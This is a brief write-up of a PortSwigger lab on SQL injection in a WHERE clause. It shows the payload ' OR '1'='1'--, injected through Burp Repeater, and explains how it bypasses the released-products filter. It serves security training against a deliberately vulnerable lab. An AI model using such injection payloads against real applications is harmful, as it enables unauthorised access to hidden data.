SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data

Let's filter by Accessories.

The resultant SQL query is:

SELECT * FROM products WHERE category = 'Accessories' AND released = 1

Since we are proxying the traffic through Burp Suite, we can access this request in the Proxy> HTTP History tab.

Let's forward this request to the Repeater for further modification.

Once in the Repeater, we can set the categories filter to the following:

' OR '1'='1'--

The resultant SQL query will be:

SELECT * FROM products WHERE category = '' OR '1' = '1'--' AND released = 1

## Queried part:
SELECT * FROM products WHERE category = '' OR '1' = '1'

## Commented part:
' AND released = 1

Since 1 is always equal to 1, the server will output all the categories. And since, we are commenting out the AND released = 1 part, even the unreleased products will be output.

We have solved the lab.

Last updated 2 years ago